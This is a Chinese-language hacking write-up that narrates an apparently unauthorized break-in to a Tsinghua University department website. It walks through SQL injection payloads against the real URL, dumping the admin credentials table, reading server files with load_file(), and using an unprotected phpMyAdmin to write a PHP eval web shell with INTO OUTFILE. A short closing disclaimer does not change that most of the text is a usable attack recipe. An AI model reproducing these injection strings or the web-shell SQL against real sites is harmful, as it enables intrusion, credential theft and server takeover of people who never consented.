前段时候清华大学被黑客入侵，并修改了主页，引起了国内的高校的深思，同时高校也更加注重网络安全了。清华大学作为国内的最高学府，在各方面来说应该都是最强的！，每年都从各省选取精英学生加入，能考入清华大学简直是光宗耀祖，按现在的话来说是牛B完了。清华被黑至今差不多有三个月了，如今清华的安全做的如何呢？是否汲取了被黑客入侵的教训而加固服务器的防御呢？

由于今天无事便与好朋友JK7OSE一起参与此次入侵检测，上次清华是新闻网被入侵的。这次我们换了目标。在百度中搜索清华的地址连接。找了一些动态页面来测试，经过仔细测试，一会儿就找到几个有问题的页面。提交经典的" ' "号，出现了一片空白。继续用 and 1=1 /* and 1=2 /* 前者返回正常 后者返回不正常。如图1：

确定为注射点后，我们开始行动。现在我们通过order by 来找字段数，通过手工判断为 16个。马上构造查询语句：http://www.ie.tsinghua.edu.cn/no ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20/*显示了许多数字，我们就是利用他们来显示我们想到的数据。显示了 3 5 9 14 我们分别在数字中插入 databse() user() version()分别显示当前连接的数据库 数据库连接的用户 数据库的版本。如图：

以ROOT用户连接的数据库，权限很高。可以利用它来读取一些敏感的文件。数据库名也有了。现在我们来找下存放管理的表名个字段，找到他们就可以爆出管理的密码了。通过手工的尝试常用的表名都没找到，后来放到几款常用的PHP注射工具里猜解都无功而返。看来管理安全意识还是不错嘛。看来通过爆密码进后台这条路不好走，我们转换入侵思路。现在不是ROOT权限呢？那我们好好的利用他们吧！现在我们来判断一些该服务器是什么类型的。把地址页面的php 改成大写的PHP，突然出现无法找的，并爆出了服务器的版本，是UNIX的服务器。如图3：
 

新手朋友可能会问为什么要改成大写的呢？WINDOWS对大小写不敏感的，UNIX服务器对大小写要敏感。通过这个细节我们就可以轻松的判断出操作系统的版本，而不动用大型的黑客扫描软件。现在我门晓得了操作系统的版本，就好针对性的入侵。现在我们尝试读取APACHE的默认配置文件，先把文件路径转换成HEX值，再读取。结果失败了，换了几个路径也不行。一般使用MYSQL的数据库的站，都喜欢用PHPMYADMIN来管理数据库，PHPMYADMIN存在路径泄露漏洞的，通过他我们就可以轻松的找到网站的路径，我们提交phpmyadmin,PHPMYADMIN.这两个路径，均无法找到，这里有二种情况一种的改了名字，另外一种的没有使用这个软件。那我们来列一下 /export/home/ 这个目录吧，如图：
 

这个文件夹下有很多用户，第三个文件夹WWW也许就是我们所要的网站路径。我们继续通过load_file()这个函数来继续读取，通过读取发现www/下面有个 homepage/文件夹，我想这个就是存放网站的目录，继续读取homepage/文件夹，果然网站目录就在这里如图：
 

，网站目录已经有了，我们尝试通过导出一句话木马来获得WEBSHELL，马上构造语句提交，访问提示无法找到，尝试换了几个目录导出也不行，估计是权限的问题和环境的限制，不解中。。在后台admin文件中读取了几个PHP文件，为的是找管理的表和字段，破解出管理的密码登陆后台夺取WEBSHELL。经过本人的耐心查找，终于在admin/login.php这个登陆文件中找到了它们的踪迹。如图：5
 

表名为：web_user 字段名为：username password.难怪工具都没猜解出来，完全依赖工具是不行的。

马上构造语句爆出密码，http://www.ie.tsinghua.edu.cn/no ... 0union%20select%201,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16%20from%20web_user%20/*如图：
 

密码是MD5加密的，马上拿到CMD5.COM去解，结果提示无法找到。难道暴力破解不成?马上把密码丢给朋友破解，N分钟过去了，没啥效果。我们先放放，找找其他的路子。我们充分利用ROOT带给我们的读取文件的方便吧，读取了几个后台上传文件，访问立即跳回了管理登陆页面，看来上传这个路子也不行！后台管理文件夹没啥利用的，那我们回来网站跟目录下看看。猛然发现有个phpMyAd235mi5n-20.6.&Lsa4Fd 的文件，这不是MYSQL数据库的管理软件吗？名字改的这么变态，不愧为清华的网站，佩服中。。马上访问居然提示无法找到，狂晕中。。还以为输入错误呢。再三测试还是一样的，那是不是显示的有问题呢？带着这个问题，我把phpMyAd235mi5n-20.6.&Lsa4Fd 中的d拆掉，访问也是无法找到，继续拆，拆到字符f后，正常的显示了PHPMYADMIN的正常页面，看来入侵渗透是要考验一个人的耐心和技巧的。PHPMYADMIN。。居然没提示我们输入任何密码就直接进入了管理页面，很晕!终于明白了清华为啥把PHPMYADMN改的那么隐蔽的原因了，真的服了清华的强人。如图：
 

到了这里我们有二种方式夺取WEBSHELL权限，1.直接修改管理的密码进入后台，在后台想办法夺取WEBSHELL。2. 直接在PHPMYADMIN后台写个一句话木马，用客户端连接获得WEBSHELL。第一种方法很繁琐，还不知道进了后台能不能成功上传PHP木马，这里我们选择第二种方式吧。使用的语句如下，具体的语句自己根据情况修改，为避免和权限产生冲突，最后把一句话木马写入到图片的上传目录。

首先选择一个数据库

----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---

通过写入一句话木马，用客户端连接成功得到WEBSHELL。如图：
 

此次渗透就到这里，希望清华的管理尽快修复漏洞，做好各方面的安全。

另外警告：严禁利用本文公布的漏洞来恶意攻击该站点，后果自负